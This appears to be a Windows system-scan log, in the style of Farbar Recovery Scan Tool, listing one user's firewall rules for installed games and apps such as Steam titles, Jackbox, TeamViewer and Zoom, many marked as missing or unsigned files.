HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer => (SmartScreenEnabled: )
Windows Firewall is enabled.
 
==================== MSCONFIG/TASK MANAGER disabled items ==
 
==================== FirewallRules (Whitelisted) ================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
FirewallRules: [UDP Query User{3E12643C-7EBF-4744-B040-EEE763C56F6D}C:\users\miggy\appdata\local\programs\blitz\blitz.exe] => (Block) C:\users\miggy\appdata\local\programs\blitz\blitz.exe => No File
FirewallRules: [TCP Query User{8C8C4890-CEFB-4483-BC1B-8DA87FE83F73}C:\users\miggy\appdata\local\programs\blitz\blitz.exe] => (Block) C:\users\miggy\appdata\local\programs\blitz\blitz.exe => No File
FirewallRules: [{BD298CC7-821E-4819-9A26-698385BA3B7A}] => (Allow) C:\Program Files\BlueStacks\HD-Player.exe => No File
FirewallRules: [UDP Query User{4A0EBC18-06EA-4C87-87A1-4C990E41C7D3}C:\users\miggy\appdata\local\microsoft\teams\current\teams.exe] => (Block) C:\users\miggy\appdata\local\microsoft\teams\current\teams.exe => No File
FirewallRules: [TCP Query User{D4275EA6-2DDD-4686-AA4D-9A3310805EEC}C:\users\miggy\appdata\local\microsoft\teams\current\teams.exe] => (Block) C:\users\miggy\appdata\local\microsoft\teams\current\teams.exe => No File
FirewallRules: [UDP Query User{0DA0174C-7AB4-49C7-BA8B-8D68E76E894D}C:\program files (x86)\call of duty black ops cold war\blackopscoldwar.exe] => (Allow) C:\program files (x86)\call of duty black ops cold war\blackopscoldwar.exe => No File
FirewallRules: [TCP Query User{E177F9D2-5A17-47BA-89BF-EE69CFBE5A1D}C:\program files (x86)\call of duty black ops cold war\blackopscoldwar.exe] => (Allow) C:\program files (x86)\call of duty black ops cold war\blackopscoldwar.exe => No File
FirewallRules: [UDP Query User{1B7CBF21-ED14-4267-9095-29AE1089A8A9}C:\program files\epic games\thecycleearlyaccess\prospect\binaries\win64\prospect-win64-shipping.exe] => (Block) C:\program files\epic games\thecycleearlyaccess\prospect\binaries\win64\prospect-win64-shipping.exe => No File
FirewallRules: [TCP Query User{FF5BFDBA-25C4-4DE2-A652-F568B110169F}C:\program files\epic games\thecycleearlyaccess\prospect\binaries\win64\prospect-win64-shipping.exe] => (Block) C:\program files\epic games\thecycleearlyaccess\prospect\binaries\win64\prospect-win64-shipping.exe => No File
FirewallRules: [{12F7E6E4-EF2A-4F53-B472-BA7450D5430E}] => (Allow) C:\Program Files\Epic Games\TheCycleEarlyAccess\Prospect\Binaries\Win64\Prospect-Win64-Shipping.exe => No File
FirewallRules: [{24770BD1-E3E6-4572-A0D8-4D8A978D0057}] => (Allow) C:\Program Files\Epic Games\TheCycleEarlyAccess\Prospect\Binaries\Win64\Prospect-Win64-Shipping.exe => No File
FirewallRules: [{27FA26BB-7CA1-4B1B-AE4F-B1FD29FF1AF9}] => (Allow) C:\Program Files\Epic Games\TheCycleEarlyAccess\Prospect\Binaries\Win64\Prospect-Win64-Shipping.exe => No File
FirewallRules: [{825C03FC-D3B6-45B1-ADDC-7EFCEA4A440F}] => (Allow) C:\Program Files\Epic Games\TheCycleEarlyAccess\Prospect\Binaries\Win64\Prospect-Win64-Shipping.exe => No File
FirewallRules: [{D40D2F7F-832F-4C48-B2B4-6CBBDB1883EB}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Brawlhalla\Brawlhalla.exe (Blue Mammoth Games) [File not signed]
FirewallRules: [{4DE15F9F-866B-4678-9B97-FB5256AE51F9}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Brawlhalla\Brawlhalla.exe (Blue Mammoth Games) [File not signed]
FirewallRules: [UDP Query User{4675CE24-74D3-4FD0-8949-9C33787B0DEB}C:\program files (x86)\steam\steamapps\common\thehunter\game\thehunter.exe] => (Block) C:\program files (x86)\steam\steamapps\common\thehunter\game\thehunter.exe => No File
FirewallRules: [TCP Query User{AD7E69AC-9D0E-4E38-B5D3-5771108ED725}C:\program files (x86)\steam\steamapps\common\thehunter\game\thehunter.exe] => (Block) C:\program files (x86)\steam\steamapps\common\thehunter\game\thehunter.exe => No File
FirewallRules: [{51E6F908-35D3-4FE6-8E6D-2BE375F7A4A1}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\theHunter\launcher\launcher.exe => No File
FirewallRules: [{A117C129-8E57-4A5F-BFC1-ADE3AC7A8EC5}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\theHunter\launcher\launcher.exe => No File
FirewallRules: [UDP Query User{A419095C-3A92-4308-BB4D-137DADFB2060}C:\program files\epic games\paladins\binaries\win64\paladins.exe] => (Block) C:\program files\epic games\paladins\binaries\win64\paladins.exe => No File
FirewallRules: [TCP Query User{EC003A0A-0F5B-4BC4-8027-127CDD34D741}C:\program files\epic games\paladins\binaries\win64\paladins.exe] => (Block) C:\program files\epic games\paladins\binaries\win64\paladins.exe => No File
FirewallRules: [{3E5B1C19-9C21-45C9-9314-7F0ED6E173C9}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\surviv.io - 2D Battle Royale\survivio.exe (Kongregate, Inc.) [File not signed]
FirewallRules: [{DAC12A37-5149-425C-86B1-940BE44AF9C5}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\surviv.io - 2D Battle Royale\survivio.exe (Kongregate, Inc.) [File not signed]
FirewallRules: [{B9F2E208-7EBC-4F05-A81E-CF26FE6EEF73}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\CS2D\CS2D.exe => No File
FirewallRules: [{6A2F2F22-97A7-4FA2-BA98-545F68C9F3DA}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\CS2D\CS2D.exe => No File
FirewallRules: [UDP Query User{4DE89CAA-64B3-4356-9F39-88239528713C}C:\users\miggy\downloads\among.us.v2020.9.9s\among.us.v2020.9.9s\among.us.v2020.9.9s\among us.exe] => (Allow) C:\users\miggy\downloads\among.us.v2020.9.9s\among.us.v2020.9.9s\among.us.v2020.9.9s\among us.exe => No File
FirewallRules: [TCP Query User{6B8E16AD-44E7-4973-8143-46712B14266E}C:\users\miggy\downloads\among.us.v2020.9.9s\among.us.v2020.9.9s\among.us.v2020.9.9s\among us.exe] => (Allow) C:\users\miggy\downloads\among.us.v2020.9.9s\among.us.v2020.9.9s\among.us.v2020.9.9s\among us.exe => No File
FirewallRules: [{8876B45B-FEDC-4E54-9ADF-7F59DA13B3DC}] => (Allow) C:\Program Files (x86)\Steam\bin\cef\cef.win7x64\steamwebhelper.exe (Valve Corp. -> Valve Corporation)
FirewallRules: [{7A09F2B5-A1B3-4584-8E04-F95AB8846A6F}] => (Allow) C:\Program Files (x86)\Steam\bin\cef\cef.win7x64\steamwebhelper.exe (Valve Corp. -> Valve Corporation)
FirewallRules: [UDP Query User{F2106FD5-AF63-4F80-B266-400CD20A79BA}C:\program files (x86)\steam\steamapps\common\cry of fear\cof.exe] => (Allow) C:\program files (x86)\steam\steamapps\common\cry of fear\cof.exe => No File
FirewallRules: [TCP Query User{C406884C-8D72-4D1E-AD55-57B21037C24B}C:\program files (x86)\steam\steamapps\common\cry of fear\cof.exe] => (Allow) C:\program files (x86)\steam\steamapps\common\cry of fear\cof.exe => No File
FirewallRules: [UDP Query User{CA1B8127-55F9-47D2-AE87-01BF3285F80A}C:\program files (x86)\steam\steamapps\common\creativedestruction\ccmini\ccmini.exe] => (Block) C:\program files (x86)\steam\steamapps\common\creativedestruction\ccmini\ccmini.exe => No File
FirewallRules: [TCP Query User{6F812FB8-9408-430F-9BEA-8F87DF1E666A}C:\program files (x86)\steam\steamapps\common\creativedestruction\ccmini\ccmini.exe] => (Block) C:\program files (x86)\steam\steamapps\common\creativedestruction\ccmini\ccmini.exe => No File
FirewallRules: [{F45FC709-9DB9-4BF4-AF32-48037B4B1E88}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\CreativeDestruction\client.exe => No File
FirewallRules: [{A7BE5101-300C-4F37-B0C6-5D6F9343BFBA}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\CreativeDestruction\client.exe => No File
FirewallRules: [{819F6E51-8D7C-46F9-8C49-728C026C4D49}] => (Allow) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe (Nvidia Corporation -> NVIDIA Corporation)
FirewallRules: [{5FA7B7A1-F6BA-495F-BBE1-0A3F7E9BA093}] => (Allow) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe (Nvidia Corporation -> NVIDIA Corporation)
FirewallRules: [{8CC426E1-EEDA-4929-8CA9-24A340632044}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer.exe (TeamViewer Germany GmbH -> TeamViewer Germany GmbH)
FirewallRules: [{70728EF1-D77C-44BE-BDA7-AEC73EE3F99E}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer.exe (TeamViewer Germany GmbH -> TeamViewer Germany GmbH)
FirewallRules: [{A2E80910-BE5B-4FAB-AB98-C2AA35F89046}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe (TeamViewer Germany GmbH -> TeamViewer Germany GmbH)
FirewallRules: [{3035735B-83F5-4F06-BE7F-4BCC14DCEB99}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe (TeamViewer Germany GmbH -> TeamViewer Germany GmbH)
FirewallRules: [{E1A9225E-ED13-43F8-A5C3-F4F45FCC0D79}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe (Valve Corp. -> Valve Corporation)
FirewallRules: [{13629218-8017-449A-87B7-9DA4166140FA}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe (Valve Corp. -> Valve Corporation)
FirewallRules: [{65B4A04D-E3BC-447A-AC84-89535112CDC7}] => (Allow) C:\Program Files (x86)\Steam\bin\cef\cef.win7\steamwebhelper.exe (Valve Corp. -> Valve Corporation)
FirewallRules: [{80EA8F03-E09D-471C-9C23-34DB1AFD0F7E}] => (Allow) C:\Program Files (x86)\Steam\bin\cef\cef.win7\steamwebhelper.exe (Valve Corp. -> Valve Corporation)
FirewallRules: [TCP Query User{DCFED574-FBAA-4975-AB72-7F191FC99BC0}C:\users\miggy\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\miggy\appdata\roaming\spotify\spotify.exe (Spotify AB -> Spotify Ltd)
FirewallRules: [UDP Query User{558C3052-13F1-48E1-92ED-E261F000125C}C:\users\miggy\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\miggy\appdata\roaming\spotify\spotify.exe (Spotify AB -> Spotify Ltd)
FirewallRules: [{7709B928-D87B-4C08-9650-BD0D55B3CEAA}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Counter-Strike Global Offensive\csgo.exe (Valve Corp. -> )
FirewallRules: [{687D0ADB-4A66-4892-9CB6-7F917CFD3BBC}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Counter-Strike Global Offensive\csgo.exe (Valve Corp. -> )
FirewallRules: [{8BCE8CA2-FF28-4C33-8BA0-C864AF161A49}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\TotallyAccurateBattlegrounds\TotallyAccurateBattlegrounds.exe => No File
FirewallRules: [{684DABB3-C018-4657-97BB-404804BD9CB1}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\TotallyAccurateBattlegrounds\TotallyAccurateBattlegrounds.exe => No File
FirewallRules: [TCP Query User{A61F39F5-AF5A-485E-9DA5-BCCA8CBC059D}C:\users\miggy\appdata\local\temp\rar$exa18180.4963\the.henry.stickmin.collection\the henry stickmin collection\henrystickmin.exe] => (Block) C:\users\miggy\appdata\local\temp\rar$exa18180.4963\the.henry.stickmin.collection\the henry stickmin collection\henrystickmin.exe () [File not signed]
FirewallRules: [UDP Query User{9DAD7DA6-8D85-43CC-A387-53B6B580375D}C:\users\miggy\appdata\local\temp\rar$exa18180.4963\the.henry.stickmin.collection\the henry stickmin collection\henrystickmin.exe] => (Block) C:\users\miggy\appdata\local\temp\rar$exa18180.4963\the.henry.stickmin.collection\the henry stickmin collection\henrystickmin.exe () [File not signed]
FirewallRules: [TCP Query User{BB752D12-153E-4A49-9DA1-E9B8C0985C29}C:\program files (x86)\overwatch\_retail_\overwatch.exe] => (Allow) C:\program files (x86)\overwatch\_retail_\overwatch.exe (Blizzard Entertainment, Inc. -> Blizzard Entertainment)
FirewallRules: [UDP Query User{C03FC8C5-DC18-4717-84EA-0F1A1B386F5F}C:\program files (x86)\overwatch\_retail_\overwatch.exe] => (Allow) C:\program files (x86)\overwatch\_retail_\overwatch.exe (Blizzard Entertainment, Inc. -> Blizzard Entertainment)
FirewallRules: [{4456857A-4FDC-4A8E-A64A-90D79024DC3C}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Aim Lab\AimLab_tb.exe () [File not signed]
FirewallRules: [{EF3DBDB9-75BD-4185-A412-5AAC58B32B81}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Aim Lab\AimLab_tb.exe () [File not signed]
FirewallRules: [{356E3ED2-C9F8-4C1F-8D1E-A3E3ED5872AC}] => (Allow) C:\Users\Miggy\AppData\Roaming\Zoom\bin\Zoom.exe (Zoom Video Communications, Inc. -> Zoom Video Communications, Inc.)
FirewallRules: [{67503904-3C3F-4311-AA42-3CE968E9459B}] => (Allow) C:\Users\Miggy\AppData\Roaming\Zoom\bin\airhost.exe => No File
FirewallRules: [{6600988A-3E8D-4BB2-9073-62009DDE9CFF}] => (Allow) C:\Users\Miggy\AppData\Roaming\Zoom\bin\airhost.exe => No File
FirewallRules: [TCP Query User{FBE7BF86-138D-479E-B64D-825C1350D34D}C:\program files\epic games\overcooked2\overcooked2.exe] => (Allow) C:\program files\epic games\overcooked2\overcooked2.exe => No File
FirewallRules: [UDP Query User{EAEFB3E2-272C-4380-9AD8-A679DBA3FD9C}C:\program files\epic games\overcooked2\overcooked2.exe] => (Allow) C:\program files\epic games\overcooked2\overcooked2.exe => No File
FirewallRules: [TCP Query User{CBA04267-ADE7-4A8F-98D5-1179FAB47424}C:\riot games\riot client\riotclientservices.exe] => (Allow) C:\riot games\riot client\riotclientservices.exe (Riot Games, Inc. -> Riot Games, Inc.)
FirewallRules: [UDP Query User{5599CAFE-FB21-4163-82A9-FFF8208FFCDF}C:\riot games\riot client\riotclientservices.exe] => (Allow) C:\riot games\riot client\riotclientservices.exe (Riot Games, Inc. -> Riot Games, Inc.)
FirewallRules: [TCP Query User{05814D12-6CA4-44EA-A1BB-B91ECB227500}C:\users\miggy\downloads\the jackbox party pack collection\the jackbox party pack collection\7\the jackbox party pack 7.exe] => (Block) C:\users\miggy\downloads\the jackbox party pack collection\the jackbox party pack collection\7\the jackbox party pack 7.exe () [File not signed]
FirewallRules: [UDP Query User{4DD2E8BC-DC9C-4519-8192-50B8A7C0624E}C:\users\miggy\downloads\the jackbox party pack collection\the jackbox party pack collection\7\the jackbox party pack 7.exe] => (Block) C:\users\miggy\downloads\the jackbox party pack collection\the jackbox party pack collection\7\the jackbox party pack 7.exe () [File not signed]
FirewallRules: [TCP Query User{45FCE454-50C4-44E0-A124-D38ED1D288FF}C:\users\miggy\downloads\the jackbox party pack collection\the jackbox party pack collection\5\the jackbox party pack 5.exe] => (Block) C:\users\miggy\downloads\the jackbox party pack collection\the jackbox party pack collection\5\the jackbox party pack 5.exe (Jackbox Games, Inc.) [File not signed]
FirewallRules: [UDP Query User{3B622155-C937-463E-BFD7-D4A45BACF17F}C:\users\miggy\downloads\the jackbox party pack collection\the jackbox party pack collection\5\the jackbox party pack 5.exe] => (Block) C:\users\miggy\downloads\the jackbox party pack collection\the jackbox party pack collection\5\the jackbox party pack 5.exe (Jackbox Games, Inc.) [File not signed]
FirewallRules: [{149A11AC-6845-4F23-9AC0-25E31A853823}] => (Allow) C:\Program Files\Mozilla Firefox\firefox.exe (Mozilla Corporation -> Mozilla Corporation)
FirewallRules: [{9E6ECAC2-5571-4810-91B9-B9FF72330AD0}] => (Allow) C:\Program Files\Mozilla Firefox\firefox.exe (Mozilla Corporation -> Mozilla Corporation)
FirewallRules: [TCP Query User{1000DD04-D380-41DE-AFF9-1D848B29B0CB}C:\users\miggy\downloads\the jackbox party pack collection\the jackbox party pack collection\4\the jackbox party pack 4.exe] => (Allow) C:\users\miggy\downloads\the jackbox party pack collection\the jackbox party pack collection\4\the jackbox party pack 4.exe (Jackbox Games, Inc.) [File not signed]
FirewallRules: [UDP Query User{7049F166-6EA5-48BA-89B7-C961956E64D1}C:\users\miggy\downloads\the jackbox party pack collection\the jackbox party pack collection\4\the jackbox party pack 4.exe] => (Allow) C:\users\miggy\downloads\the jackbox party pack collection\the jackbox party pack collection\4\the jackbox party pack 4.exe (Jackbox Games, Inc.) [File not signed]
FirewallRules: [TCP Query User{C0AB333E-B963-49AF-9D11-C36C98114DD9}C:\users\miggy\downloads\the jackbox party pack collection\the jackbox party pack collection\6\the jackbox party pack 6.exe] => (Allow) C:\users\miggy\downloads\the jackbox party pack collection\the jackbox party pack collection\6\the jackbox party pack 6.exe (Jackbox Games, Inc.) [File not signed]
FirewallRules: [UDP Query User{5CC520B6-DAC6-4115-BB18-F039E1666639}C:\users\miggy\downloads\the jackbox party pack collection\the jackbox party pack collection\6\the jackbox party pack 6.exe] => (Allow) C:\users\miggy\downloads\the jackbox party pack collection\the jackbox party pack collection\6\the jackbox party pack 6.exe (Jackbox Games, Inc.) [File not signed]
FirewallRules: [{F60FB8AB-15F5-4D67-91BD-A47314F526C4}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Deceit\bin\win_x64\Deceit.exe => No File
FirewallRules: [{BB6919EA-8FF7-47DB-BD1A-68ABBA53C6B0}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Deceit\bin\win_x64\Deceit.exe => No File
FirewallRules: [{55BCF914-6939-43C0-9D57-681AF1273AFC}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Super Animal Royale\Super Animal Royale.exe () [File not signed]
FirewallRules: [{2E4C8ECF-4E93-45DF-B319-37EE82288616}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Super Animal Royale\Super Animal Royale.exe () [File not signed]
FirewallRules: [TCP Query User{2904BFCE-FCC6-4FF5-B534-4ACFF3F0CFC8}C:\program files\epic games\hyperscape\hyperscape.exe] => (Allow) C:\program files\epic games\hyperscape\hyperscape.exe => No File
FirewallRules: [UDP Query User{62F001EC-E422-4990-BFD3-E1AB751FAE99}C:\program files\epic games\hyperscape\hyperscape.exe] => (Allow) C:\program files\epic games\hyperscape\hyperscape.exe => No File
FirewallRules: [{250CF44C-1F5D-4132-9FAB-DA648C1ABD26}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Splitgate\PortalWars\Binaries\Win64\PortalWars-Win64-Shipping.exe => No File
FirewallRules: [{0A964258-98FC-486F-B2EA-34A83CB40E3A}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Splitgate\PortalWars\Binaries\Win64\PortalWars-Win64-Shipping.exe => No File
FirewallRules: [{47BD7F4A-BE92-48F0-B699-7F92C199E69A}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Muck\Muck.exe () [File not signed]
FirewallRules: [{65CFA16F-BDC1-401E-A3F3-46394EF84F37}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Muck\Muck.exe () [File not signed]
FirewallRules: [TCP Query User{05E53D1F-8F73-4D83-88D4-E3EF1D21AAD0}C:\program files (x86)\steam\steamapps\common\pacify\pacify\binaries\win64\pacify-win64-shipping.exe] => (Allow) C:\program files (x86)\steam\steamapps\common\pacify\pacify\binaries\win64\pacify-win64-shipping.exe (Shawn Hitchcock) [File not signed]
FirewallRules: [UDP Query User{D2802595-8323-4996-A3DB-B2053205A57E}C:\program files (x86)\steam\steamapps\common\pacify\pacify\binaries\win64\pacify-win64-shipping.exe] => (Allow) C:\program files (x86)\steam\steamapps\common\pacify\pacify\binaries\win64\pacify-win64-shipping.exe (Shawn Hitchcock) [File not signed]
FirewallRules: [TCP Query User{91F12ED7-2766-4E6B-827B-B816725E6E09}C:\program files (x86)\steam\steamapps\common\retail royale playtest\ikeabr_server\binaries\win64\ikeabr_server-win64-shipping.exe] => (Block) C:\program files (x86)\steam\steamapps\common\retail royale playtest\ikeabr_server\binaries\win64\ikeabr_server-win64-shipping.exe => No File
FirewallRules: [UDP Query User{DCFB4155-590D-4220-B40D-25CB5C9BB385}C:\program files (x86)\steam\steamapps\common\retail royale playtest\ikeabr_server\binaries\win64\ikeabr_server-win64-shipping.exe] => (Block) C:\program files (x86)\steam\steamapps\common\retail royale playtest\ikeabr_server\binaries\win64\ikeabr_server-win64-shipping.exe => No File
FirewallRules: [TCP Query User{3DB8DFA7-2522-4AF8-ACC6-8D45B36F7373}C:\program files\epic games\fortnite\fortnitegame\binaries\win64\fortniteclient-win64-shipping.exe] => (Block) C:\program files\epic games\fortnite\fortnitegame\binaries\win64\fortniteclient-win64-shipping.exe => No File
FirewallRules: [UDP Query User{39AFD781-AC7A-488C-8592-BE0915131F04}C:\program files\epic games\fortnite\fortnitegame\binaries\win64\fortniteclient-win64-shipping.exe] => (Block) C:\program files\epic games\fortnite\fortnitegame\binaries\win64\fortniteclient-win64-shipping.exe => No File
FirewallRules: [TCP Query User{B333236D-5DE9-4EAE-BC1F-B00AAD0BB549}C:\program files\epic games\saintsrowthethird\srttr.exe] => (Allow) C:\program files\epic games\saintsrowthethird\srttr.exe => No File
FirewallRules: [UDP Query User{20E062AD-9148-410B-BDFD-326EED231C4F}C:\program files\epic games\saintsrowthethird\srttr.exe] => (Allow) C:\program files\epic games\saintsrowthethird\srttr.exe => No File
FirewallRules: [TCP Query User{EF14DFC7-AF28-49AF-8997-0F02030DB00D}C:\users\miggy\downloads\windowsnoeditor\windowsnoeditor\spongemassacre\binaries\win64\spongemassacre.exe] => (Allow) C:\users\miggy\downloads\windowsnoeditor\windowsnoeditor\spongemassacre\binaries\win64\spongemassacre.exe => No File
FirewallRules: [UDP Query User{21152F44-B05B-4BBF-A8EC-EDAF24C1BA14}C:\users\miggy\downloads\windowsnoeditor\windowsnoeditor\spongemassacre\binaries\win64\spongemassacre.exe] => (Allow) C:\users\miggy\downloads\windowsnoeditor\windowsnoeditor\spongemassacre\binaries\win64\spongemassacre.exe => No File
FirewallRules: [TCP Query User{CC80FBC5-71E4-426F-94D6-E20D2F782855}C:\users\miggy\downloads\instinct021\windowsnoeditor\instinct\binaries\win64\instinct.exe] => (Allow) C:\users\miggy\downloads\instinct021\windowsnoeditor\instinct\binaries\win64\instinct.exe => No File
FirewallRules: [UDP Query User{3A99AB51-E8C5-41DD-B517-C38486ED9C07}C:\users\miggy\downloads\instinct021\windowsnoeditor\instinct\binaries\win64\instinct.exe] => (Allow) C:\users\miggy\downloads\instinct021\windowsnoeditor\instinct\binaries\win64\instinct.exe => No File
FirewallRules: [TCP Query User{BD2E3FBB-6427-438C-A1D4-B16A68A3EF86}C:\program files (x86)\origin games\battlefield 2042 open beta\bf.exe] => (Allow) C:\program files (x86)\origin games\battlefield 2042 open beta\bf.exe => No File
FirewallRules: [UDP Query User{0B75CCC6-30BE-48C1-87ED-1FB923820B07}C:\program files (x86)\origin games\battlefield 2042 open beta\bf.exe] => (Allow) C:\program files (x86)\origin games\battlefield 2042 open beta\bf.exe => No File
FirewallRules: [TCP Query User{63DF027F-7F80-445C-BE62-9E4CCD612957}C:\users\miggy\downloads\those-nights-at-rachel's\those nights at rachel's\windowsnoeditor\engine\binaries\win64\ue4game-win64-shipping.exe] => (Allow) C:\users\miggy\downloads\those-nights-at-rachel's\those nights at rachel's\windowsnoeditor\engine\binaries\win64\ue4game-win64-shipping.exe => No File
FirewallRules: [UDP Query User{75585054-1A8D-4D89-B625-99B5D06A2676}C:\users\miggy\downloads\those-nights-at-rachel's\those nights at rachel's\windowsnoeditor\engine\binaries\win64\ue4game-win64-shipping.exe] => (Allow) C:\users\miggy\downloads\those-nights-at-rachel's\those nights at rachel's\windowsnoeditor\engine\binaries\win64\ue4game-win64-shipping.exe => No File
FirewallRules: [TCP Query User{FA3863B9-CA16-4FF0-9083-834839CC0557}C:\users\miggy\downloads\the jackbox party pack collection\the jackbox party pack collection\3\the jackbox party pack 3.exe] => (Block) C:\users\miggy\downloads\the jackbox party pack collection\the jackbox party pack collection\3\the jackbox party pack 3.exe (Jackbox Games, Inc.) [File not signed]
FirewallRules: [UDP Query User{D6ABD18D-3DAA-4EA5-A177-840605D6010C}C:\users\miggy\downloads\the jackbox party pack collection\the jackbox party pack collection\3\the jackbox party pack 3.exe] => (Block) C:\users\miggy\downloads\the jackbox party pack collection\the jackbox party pack collection\3\the jackbox party pack 3.exe (Jackbox Games, Inc.) [File not signed]
FirewallRules: [{59C0890E-1D74-471F-B3F6-3F0DFB64CD8B}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Crab Game\Crab Game.exe () [File not signed]
FirewallRules: [{E40EC143-367E-4D37-A2AA-34EBAC71DE8B}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Crab Game\Crab Game.exe () [File not signed]
FirewallRules: [{3A662476-6436-4340-BDBA-D72F5B1DDBCB}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\StickFightTheGame\StickFight.exe () [File not signed]
FirewallRules: [{2C981B99-5654-4040-AB2C-0C85F9BF7F6D}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\StickFightTheGame\StickFight.exe () [File not signed]
FirewallRules: [TCP Query User{648A1015-13D1-4750-959B-B3707421499C}C:\users\miggy\downloads\the jackbox party pack collection\the jackbox party pack collection\2\the jackbox party pack 2.exe] => (Block) C:\users\miggy\downloads\the jackbox party pack collection\the jackbox party pack collection\2\the jackbox party pack 2.exe (Jackbox Games, Inc.) [File not signed]
FirewallRules: [UDP Query User{168C3E0D-E85E-4884-A7C9-B97F50C07352}C:\users\miggy\downloads\the jackbox party pack collection\the jackbox party pack collection\2\the jackbox party pack 2.exe] => (Block) C:\users\miggy\downloads\the jackbox party pack collection\the jackbox party pack collection\2\the jackbox party pack 2.exe (Jackbox Games, Inc.) [File not signed]
FirewallRules: [TCP Query User{F3243ACC-FECE-4A39-814F-08991E028BD7}C:\program files (x86)\steam\steamapps\common\super people playtest\bravohotelgame\binaries\win64\bravohotelclient-win64-shipping.protected.exe] => (Allow) C:\program files (x86)\steam\steamapps\common\super people playtest\bravohotelgame\binaries\win64\bravohotelclient-win64-shipping.protected.exe => No File
FirewallRules: [UDP Query User{9F956304-1916-4BBE-B51E-B9955FA67210}C:\program files (x86)\steam\steamapps\common\super people playtest\bravohotelgame\binaries\win64\bravohotelclient-win64-shipping.protected.exe] => (Allow) C:\program files (x86)\steam\steamapps\common\super people playtest\bravohotelgame\binaries\win64\bravohotelclient-win64-shipping.protected.exe => No File
FirewallRules: [{72AFCC65-2896-411A-86AB-C02C9CDECE95}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Aim Lab\AimLab.exe => No File
FirewallRules: [{4E2F0CD6-5EBE-4A56-9ACE-A151BB38F9D8}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Aim Lab\AimLab.exe => No File
FirewallRules: [TCP Query User{6A6EAC4D-2160-4919-9E3B-52A6F2148730}C:\users\miggy\appdata\local\packages\microsoft.4297127d64ec6_8wekyb3d8bbwe\localcache\local\runtime\java-runtime-beta\windows-x64\java-runtime-beta\bin\javaw.exe] => (Allow) C:\users\miggy\appdata\local\packages\microsoft.4297127d64ec6_8wekyb3d8bbwe\localcache\local\runtime\java-runtime-beta\windows-x64\java-runtime-beta\bin\javaw.exe
FirewallRules: [UDP Query User{9792E1CF-36FA-4196-A0A3-10AE3AD1A005}C:\users\miggy\appdata\local\packages\microsoft.4297127d64ec6_8wekyb3d8bbwe\localcache\local\runtime\java-runtime-beta\windows-x64\java-runtime-beta\bin\javaw.exe] => (Allow) C:\users\miggy\appdata\local\packages\microsoft.4297127d64ec6_8wekyb3d8bbwe\localcache\local\runtime\java-runtime-beta\windows-x64\java-runtime-beta\bin\javaw.exe
FirewallRules: [{CFD8B036-590C-4835-9836-19C2225A051D}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Stardew Valley\Stardew Valley.exe (ConcernedApe) [File not signed]
FirewallRules: [{C94C221F-D765-409C-9AB1-EB9B32BEF9EC}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Stardew Valley\Stardew Valley.exe (ConcernedApe) [File not signed]
FirewallRules: [TCP Query User{8F0BC06D-47BF-4A1B-8748-76D98EA42492}C:\program files (x86)\call of duty vanguard\vanguard.exe] => (Allow) C:\program files (x86)\call of duty vanguard\vanguard.exe => No File
FirewallRules: [UDP Query User{8C990EE8-302F-4E35-BE93-F404C8D857C8}C:\program files (x86)\call of duty vanguard\vanguard.exe] => (Allow) C:\program files (x86)\call of duty vanguard\vanguard.exe => No File
FirewallRules: [{58A4BBA7-11E4-4337-992B-6CF72F8D65AE}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\CastleCrashers\castle.exe () [File not signed]
FirewallRules: [{5805045B-A6F2-48E9-ADE3-6136EF9A8988}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\CastleCrashers\castle.exe () [File not signed]
FirewallRules: [TCP Query User{EA95B6C7-268C-467F-84CD-4FB5AC97A4FC}C:\users\miggy\downloads\4.0.0b\fnaf forgotten pizzeria.exe] => (Block) C:\users\miggy\downloads\4.0.0b\fnaf forgotten pizzeria.exe => No File
FirewallRules: [UDP Query User{1CE7380D-889B-43D9-9F29-2EDADE5CBBC4}C:\users\miggy\downloads\4.0.0b\fnaf forgotten pizzeria.exe] => (Block) C:\users\miggy\downloads\4.0.0b\fnaf forgotten pizzeria.exe => No File
